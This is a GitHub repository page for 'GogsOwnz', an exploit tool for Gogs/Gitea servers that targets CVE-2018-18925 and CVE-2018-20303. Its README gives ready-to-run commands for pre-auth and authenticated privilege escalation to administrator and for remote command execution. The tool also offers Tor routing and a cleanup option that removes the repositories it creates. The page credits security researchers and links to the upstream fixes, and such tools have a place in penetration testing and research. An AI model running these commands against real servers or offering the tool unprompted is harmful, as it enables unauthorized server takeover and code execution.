Skip to content

cs8425/gogsownz

BranchesTags
 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commit
gogsownz.pdf
gogsownz.pdf
 
 
gogsownz.py
gogsownz.py
 
 
payload
payload
 
 
readme.md
readme.md
 
 
sess.go
sess.go
 
 

Repository files navigation

GogsOwnz

GogsOwnz is a simple script to gain administrator rights and RCE on a Gogs/Gitea server.
Exploit vulnerabilities in Gogs/Gitea, including CVE-2018-18925, CVE-2018-20303.

Legal Disclaimer This script is offered as is. No warranty, use on your own, please obey the law.

Typical Usage - [Please, read the full usage]

Get info about Gogs/Gitea running

python3 gogsownz.py https://127.0.0.1:3000/ -v --info

Exploit preauth PrivEsc

python3 gogsownz.py https://127.0.0.1:3000/ -v --preauth

Exploit PrivEsc

python3 gogsownz.py https://127.0.0.1:3000/ -v -C '<user>:<password>' --cleanup

or alternatively

python3 gogsownz.py https://127.0.0.1:3000/ -v -c '<i_like_gogs_cookie>' --cleanup

Exploit preauth RCE

python3 gogsownz.py https://127.0.0.1:3000/ -v --preauth --rce 'sleep 10' --cleanup

Exploit auth RCE

python3 gogsownz.py https://127.0.0.1:3000/ -v -C '<user>:<password>' --rce 'sleep 10' --cleanup

Full usage

usage: gogsownz [-h] [-C CREDS] [-n COOKIENAME] [-c COOKIE] [-i] [--rce RCE]
                [--repo REPO] [--preauth] [--windows] [--cleanup] [--tor]
                [--check-tor] [--burp] [-k] [--verbose]
                url

positional arguments:
  url                   URL for the Gogs server

optional arguments:
  -h, --help            show this help message and exit
  -C CREDS, --creds CREDS
                        Credentials for the Gogs server, in the from
                        "username:password"
  -n COOKIENAME, --cookie-name COOKIENAME
                        Name of the Gogs-specific session cookie
  -c COOKIE, --cookie COOKIE
                        Session for the Gogs server, the value in the
                        i_like_gogits Cookie
  -i, --info            Only detect informations about the running Gogs
                        server, then quit
  --rce RCE             Command to execute on the Gogs server
  --repo REPO           Use an existing repo for the PrivEsc
  --preauth             Try the pre-auth vulnerability
  --windows             Gogs server runs on Windows
  --cleanup             Remove all created repo after exploit
  --tor                 Use tor proxy when performing requests
  --check-tor           Check that Tor is correctly set up before running
  --burp                Use burp proxy when performing requests
  -k, --insecure        Allow insecure server connections when using SSL
  --verbose, -v

Thanks

Thanks to:

  • Tencent Security (@md5_salt, @ma7h1as and @chromium1337)
  • PentesterLab (@snyff)
  • LuckyC4t
  • the gogs security community :D

Further readings

gogs/gogs#5469
gogs/gogs#5558
https://github.com/gogs/gogs/commit/8c8c37a66b4cef6fc8a995ab1b4fd6e530c49c51
gogs/gogs#5599
https://2018.zeronights.ru/wp-content/uploads/materials/17-Who-owned-your-code.pdf

About

Gogs CVEs

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages

  • Python 97.1%
  • Go 2.9%